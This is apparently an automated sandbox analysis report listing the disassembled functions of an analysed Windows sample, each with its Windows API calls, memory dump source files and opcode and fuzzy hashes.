                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00411C18
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00411C26
                                                                                • __wsplitpath.LIBCMT ref: 00411C54
                                                                                  • Part of subcall function 003D1DFC: __wsplitpath_helper.LIBCMT ref: 003D1E3C
                                                                                • _wcscat.LIBCMT ref: 00411C69
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00411CDF
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00411CF1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                • String ID:
                                                                                • API String ID: 1380811348-0
                                                                                • Opcode ID: 550dd946dfa30376a0cc390be2f3f11d80d4a7f80711719a2cabafc47e619154
                                                                                • Instruction ID: a860b3eaa126bacfa4e0bf0b62962a6db0cb0ae6175869bb9e0105d67ef59695
                                                                                • Opcode Fuzzy Hash: 550dd946dfa30376a0cc390be2f3f11d80d4a7f80711719a2cabafc47e619154
                                                                                • Instruction Fuzzy Hash: E3516E715043409FD721EF24D885FABB7E8EF88754F00492EF6859B251EB74EA04CB96
                                                                                Function 00412FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00413C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004130AF
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004130EF
                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00413112
                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0041313B
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041317E
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0041318B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 3451389628-0
                                                                                • Opcode ID: 0ffe1cc7202c9f52acf3ced28ec09b0192045e569a7503be2a7d636e72c5a854
                                                                                • Instruction ID: 447789c2358bc808817acb62c55e52f4a88486516832105ac50de2b4621ff5db
                                                                                • Opcode Fuzzy Hash: 0ffe1cc7202c9f52acf3ced28ec09b0192045e569a7503be2a7d636e72c5a854
                                                                                • Instruction Fuzzy Hash: 89515831508304AFC705EF64C881EAABBF9BF88308F04495EF6558B2A1DB75EA45CB56
                                                                                Function 004184DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 00418540
                                                                                • GetMenuItemCount.USER32(00000000), ref: 00418577
                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0041859F
                                                                                • GetMenuItemID.USER32(?,?), ref: 0041860E
                                                                                • GetSubMenu.USER32(?,?), ref: 0041861C
                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0041866D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                • String ID:
                                                                                • API String ID: 650687236-0
                                                                                • Opcode ID: 4db7983f9cf4af4f72bf0d981172f17d58d36f60bde9daaf3c8ce1ccca38229b
                                                                                • Instruction ID: eb929aee77b2bd410f0cad8519a4fbded5d1d08187e34a10a0deed2da678d22e
                                                                                • Opcode Fuzzy Hash: 4db7983f9cf4af4f72bf0d981172f17d58d36f60bde9daaf3c8ce1ccca38229b
                                                                                • Instruction Fuzzy Hash: CA519E35E00218AFCB12EF64C945AEEB7F5EF48310F10446AE915BB351DB34AE818B99
                                                                                Function 003F4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003F4B10
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F4B5B
                                                                                • IsMenu.USER32(00000000), ref: 003F4B7B
                                                                                • CreatePopupMenu.USER32 ref: 003F4BAF
                                                                                • GetMenuItemCount.USER32(000000FF), ref: 003F4C0D
                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003F4C3E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                • String ID:
                                                                                • API String ID: 3311875123-0
                                                                                • Opcode ID: c43e4f39708c02214cf3baaf33ac184a05e8b29af506c88a25a76772df3820b5
                                                                                • Instruction ID: 6d78cf88a31fd9380f280b13a02bd61d3a2d59e1f39e0ef0bd6ca18b809fa59e
                                                                                • Opcode Fuzzy Hash: c43e4f39708c02214cf3baaf33ac184a05e8b29af506c88a25a76772df3820b5
                                                                                • Instruction Fuzzy Hash: 3251CF70A0130DEBDF26CFA8D988BBEBBF8AF44318F144169E6559B291E3709D44CB51
                                                                                Function 00408DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0044DC00), ref: 00408E7C
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00408E89
                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00408EAD
                                                                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00408EC5
                                                                                • _strlen.LIBCMT ref: 00408EF7
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00408F6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_strlenselect
                                                                                • String ID:
                                                                                • API String ID: 2217125717-0
                                                                                • Opcode ID: df4e2034255185a08ca97e70bf611eb5aef1eba7e0f8233fd3e9fb9c03e86083
                                                                                • Instruction ID: 459d5a9fd32d537c0539c8a526585dd3aea0988f0f52db6fb5a157f20ba1931d
                                                                                • Opcode Fuzzy Hash: df4e2034255185a08ca97e70bf611eb5aef1eba7e0f8233fd3e9fb9c03e86083
                                                                                • Instruction Fuzzy Hash: 5441A271900104ABCB15EBB4CE85EEEB7B9AF48314F10456EF656AB2D1DF349E00CB54
                                                                                Function 003CABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • BeginPaint.USER32(?,?,?), ref: 003CAC2A
                                                                                • GetWindowRect.USER32(?,?), ref: 003CAC8E
                                                                                • ScreenToClient.USER32(?,?), ref: 003CACAB
                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003CACBC
                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 003CAD06
                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0042E673
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                • String ID:
                                                                                • API String ID: 2592858361-0
                                                                                • Opcode ID: 5927704361143790ef58eda39bb42a5f882451aa7d5130bca7c702edbfd966c3
                                                                                • Instruction ID: 9d54d04f749a72ce3fe8f57c8ceb61e08551de2ea271256563fdc2fd5785ad49
                                                                                • Opcode Fuzzy Hash: 5927704361143790ef58eda39bb42a5f882451aa7d5130bca7c702edbfd966c3
                                                                                • Instruction Fuzzy Hash: 3941CF705006049FC711DF29DC85FBB7BA8EB59724F04022DF9A9C72A1C335AC85DB66
                                                                                Function 0041E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(00471628,00000000,00471628,00000000,00000000,00471628,?,0042DC5D,00000000,?,00000000,00000000,00000000,?,0042DAD1,00000004), ref: 0041E40B
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0041E42F
                                                                                • ShowWindow.USER32(00471628,00000000), ref: 0041E48F
                                                                                • ShowWindow.USER32(00000000,00000004), ref: 0041E4A1
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0041E4C5
                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0041E4E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 642888154-0
                                                                                • Opcode ID: 522820eece423a0947f806f5fd8972e13a35815a722c6d5fe893dea7af72f32d
                                                                                • Instruction ID: c5a189ee7f34ec67dd090749000ddb4c5d474e539ec0ee5e05189c78aa850157
                                                                                • Opcode Fuzzy Hash: 522820eece423a0947f806f5fd8972e13a35815a722c6d5fe893dea7af72f32d
                                                                                • Instruction Fuzzy Hash: B4417238601150EFDB22CF25C599BD57BE1BF05304F1841BAEE598F2A2C735E881CB55
                                                                                Function 003F98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 003F98D1
                                                                                  • Part of subcall function 003CF4EA: std::exception::exception.LIBCMT ref: 003CF51E
                                                                                  • Part of subcall function 003CF4EA: __CxxThrowException@8.LIBCMT ref: 003CF533
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003F9908
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 003F9924
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 003F999E
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003F99B3
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 003F99D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 2537439066-0
                                                                                • Opcode ID: ee5ced94c186a43eb23204b8fc64d179242bda78fc25efa1c0fe534507dc44b8
                                                                                • Instruction ID: 450cd7a8154dfcb7ec883f8732da767d502ad3dcd7d38ff05117d93996807715
                                                                                • Opcode Fuzzy Hash: ee5ced94c186a43eb23204b8fc64d179242bda78fc25efa1c0fe534507dc44b8
                                                                                • Instruction Fuzzy Hash: C0315E31A00105AFDB11AFA5DC85EABB779FF45710B1580B9F904EB246D770DE14CBA4
                                                                                Function 00409B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,004077F4,?,?,00000000,00000001), ref: 00409B53
                                                                                  • Part of subcall function 00406544: GetWindowRect.USER32(?,?), ref: 00406557
                                                                                • GetDesktopWindow.USER32 ref: 00409B7D
                                                                                • GetWindowRect.USER32(00000000), ref: 00409B84
                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00409BB6
                                                                                  • Part of subcall function 003F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003F7AD0
                                                                                • GetCursorPos.USER32(?), ref: 00409BE2
                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00409C44
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                • String ID:
                                                                                • API String ID: 4137160315-0
                                                                                • Opcode ID: f83afdd6033af10d55ad900135e07c9e05a02270cd43db83a1df48026bfa01b7
                                                                                • Instruction ID: 8be5649888cd8bc81c763d9e535d42ba31d4cf54febbb2db68b38079d9dbb5c5
                                                                                • Opcode Fuzzy Hash: f83afdd6033af10d55ad900135e07c9e05a02270cd43db83a1df48026bfa01b7
                                                                                • Instruction Fuzzy Hash: F931CF72604319ABC710DF14EC49F9BB7E9FF89314F00092AF595E7282DA31EA14CB96
                                                                                Function 003EAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003EAFAE
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 003EAFB5
                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003EAFC4
                                                                                • CloseHandle.KERNEL32(00000004), ref: 003EAFCF
                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003EAFFE
                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 003EB012
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                • String ID:
                                                                                • API String ID: 1413079979-0
                                                                                • Opcode ID: 0392fc88f57c1e037e5d74342095f4c3c528254945228c1f6c00b8dcca9e5445
                                                                                • Instruction ID: c7dfb1c25e85a318c4aa211d21cb676ac76f5b95a4f3bfa2c934ea6e48ae398e
                                                                                • Opcode Fuzzy Hash: 0392fc88f57c1e037e5d74342095f4c3c528254945228c1f6c00b8dcca9e5445
                                                                                • Instruction Fuzzy Hash: 3E218B72504259AFCF028FA5ED09FEE7BA9EF44704F144125FE01A21A1C376ED21EB61
                                                                                Function 0041EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003CAFE3
                                                                                  • Part of subcall function 003CAF83: SelectObject.GDI32(?,00000000), ref: 003CAFF2
                                                                                  • Part of subcall function 003CAF83: BeginPath.GDI32(?), ref: 003CB009
                                                                                  • Part of subcall function 003CAF83: SelectObject.GDI32(?,00000000), ref: 003CB033
                                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0041EC20
                                                                                • LineTo.GDI32(00000000,00000003,?), ref: 0041EC34
                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0041EC42
                                                                                • LineTo.GDI32(00000000,00000000,?), ref: 0041EC52
                                                                                • EndPath.GDI32(00000000), ref: 0041EC62
                                                                                • StrokePath.GDI32(00000000), ref: 0041EC72
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                • String ID:
                                                                                • API String ID: 43455801-0
                                                                                • Opcode ID: 4a6a29c401cd67aefe3d3a2064332e86a0dd4506789051087cf7cf0a09022a06
                                                                                • Instruction ID: 9419f81d8cb07481a4c3c67aa8fdb7c5a5a8719a8dd93bb269a5e054a048552d
                                                                                • Opcode Fuzzy Hash: 4a6a29c401cd67aefe3d3a2064332e86a0dd4506789051087cf7cf0a09022a06
                                                                                • Instruction Fuzzy Hash: D611057640014DBFEF069FA4EC88EEA7F6DEB08354F048122BE098A170D7719D95DBA4
                                                                                Function 003EE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 003EE1C0
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 003EE1D1
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003EE1D8
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 003EE1E0
                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003EE1F7
                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 003EE209
                                                                                  • Part of subcall function 003E9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,003E9A05,00000000,00000000,?,003E9DDB), ref: 003EA53A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                • String ID:
                                                                                • API String ID: 603618608-0
                                                                                • Opcode ID: e0743c35f53a3bdc85d938cfe649df86e3988d2ecee56608e629e6f09ecb65e3
                                                                                • Instruction ID: 63d4abf93aba5782bf95aef2827c44d8a6c9dd4d02e47e6fd5e974db3abd16bb
                                                                                • Opcode Fuzzy Hash: e0743c35f53a3bdc85d938cfe649df86e3988d2ecee56608e629e6f09ecb65e3
                                                                                • Instruction Fuzzy Hash: D9018FB5E00754BFEB109BA6DC46B5EBFB8EB48751F004066FE08AB2D0D6709C00CBA0
                                                                                Function 003D7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __init_pointers.LIBCMT ref: 003D7B47
                                                                                  • Part of subcall function 003D123A: __initp_misc_winsig.LIBCMT ref: 003D125E
                                                                                  • Part of subcall function 003D123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003D7F51
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003D7F65
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003D7F78
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003D7F8B
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003D7F9E
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003D7FB1
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003D7FC4
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003D7FD7
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003D7FEA
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003D7FFD
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003D8010
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003D8023
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003D8036
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003D8049
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003D805C
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003D806F
                                                                                • __mtinitlocks.LIBCMT ref: 003D7B4C
                                                                                  • Part of subcall function 003D7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0046AC68,00000FA0,?,?,003D7B51,003D5E77,00466C70,00000014), ref: 003D7E41
                                                                                • __mtterm.LIBCMT ref: 003D7B55
                                                                                  • Part of subcall function 003D7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003D7B5A,003D5E77,00466C70,00000014), ref: 003D7D3F
                                                                                  • Part of subcall function 003D7BBD: _free.LIBCMT ref: 003D7D46
                                                                                  • Part of subcall function 003D7BBD: DeleteCriticalSection.KERNEL32(0046AC68,?,?,003D7B5A,003D5E77,00466C70,00000014), ref: 003D7D68
                                                                                • __calloc_crt.LIBCMT ref: 003D7B7A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 003D7BA3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
